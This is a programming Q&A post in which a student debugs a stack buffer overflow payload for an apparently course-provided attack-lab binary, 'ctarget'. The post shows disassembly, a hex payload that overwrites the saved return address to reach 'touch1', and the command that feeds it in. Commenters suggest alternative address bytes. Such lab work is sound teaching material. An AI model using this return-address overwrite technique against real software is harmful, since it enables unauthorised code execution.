# Buffer overflow -- old rbp space and return space

Tags: c, assembly, buffer-overflow

I have a program (`ctarget`) that uses the `gets()` function into a buffer. I need to overflow the buffer and call another program. From the assembly code (I don't have the source code) I can see the size of the stack allocation (0x38):

```
000000000040194a <getbuf>:
  40194a:   48 83 ec 38             sub    $0x38,%rsp
  40194e:   48 89 e7                mov    %rsp,%rdi
  401951:   e8 8a 02 00 00          callq  401be0 <Gets>
  401956:   b8 01 00 00 00          mov    $0x1,%eax
  40195b:   48 83 c4 38             add    $0x38,%rsp
  40195f:   c3                      retq
```

I have another program (`hex2raw`) that reads in a text file and converts hex characters to raw binary data. So I have the following in `exploit1.txt`

```
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00
/* at this point there is no seg fault */
00 00 00 00 00 00 00 00 /* 8 byte old rbp */
60 19 40 00 00 00 00 00 /* 8 bytes address */
```

The leading zeros are padding the buffer. I've made a comment at the point in which the program does not seg fault. I've added 8 more bytes to fill in the `old %rbp` place on the stack. Lastly, I've added the address of the desired function into (what is supposed to be) the return space -- in little endian order.

Using the `hex2raw` program I can execute the program with the following command: `./hex2raw < exploit1.txt | ./ctarget`

When I do run with the above, I get a seg fault.

Here is the assembly for the function I'm trying to call:

```
0000000000401960 <touch1>:
  401960:   48 83 ec 08             sub    $0x8,%rsp
  401964:   c7 05 ae 3b 20 00 01    movl   $0x1,0x203bae(%rip)        # 60551c <vlevel>
  40196b:   00 00 00 
  40196e:   bf 6a 32 40 00          mov    $0x40326a,%edi
  401973:   e8 68 f3 ff ff          callq  400ce0 <puts@plt>
  401978:   bf 01 00 00 00          mov    $0x1,%edi
  40197d:   e8 b4 04 00 00          callq  401e36 <validate>
  401982:   bf 00 00 00 00          mov    $0x0,%edi
  401987:   e8 e4 f4 ff ff          callq  400e70 <exit@plt>
```

What do I have wrong?

I'm given the functions `getbuf()` and `touch1()` if it helps:

```
  4 int getbuf() {
  6     char buf[BUFFER_SIZE];
  7     Gets(buf);
  8     return 1;
  9 }

void touch1() {
    vlevel = 1;       /* Part of validation protocol */
    printf("Touch1!: You called touch1()\n");
    validate(1);
    exit(0);
}
```

Comment: It is a 64 bit binary? please attach also registers info and stack dump

Comment: if 64 bit, try this 60 19 40 00 ff ff ff ff

Comment: Sorry, only now I have seen my previous comment, try this as  8 bytes address -> 60 19 40 00 ff ff ff 7f